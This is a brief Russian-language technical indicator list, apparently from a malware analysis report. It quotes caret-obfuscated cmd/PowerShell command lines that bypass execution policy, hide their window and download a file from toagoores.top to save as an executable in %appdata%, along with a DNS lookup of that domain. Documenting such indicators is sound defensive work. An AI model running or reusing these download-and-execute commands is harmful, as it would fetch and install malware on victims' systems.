Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Powe^R^s^Hell.Exe -E^X^EcUTiON^P^OLiCY^ ^byP^as^s ^-nopr^ofilE ^-WindO^WsTYLe ^HID^deN^ (NeW-ob^JEC^t ^S^ystEm.neT^.WeB^C^Li^e^nT)^.^d^O^w^nloADfIL^E^(^'http://toagoores.top/read....
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "Powe^R^s^Hell.Exe -E^X^EcUTiON^P^OLiCY^ ^byP^as^s ^-nopr^ofilE ^-WindO^WsTYLe ^HID^deN^ (NeW-ob^JEC^t ^S^ystEm.neT^.WeB^C^Li^e^nT)^.^d^O^w^nloADfIL^E^(^'http://toagoores.top/read....' (со скрытым окном)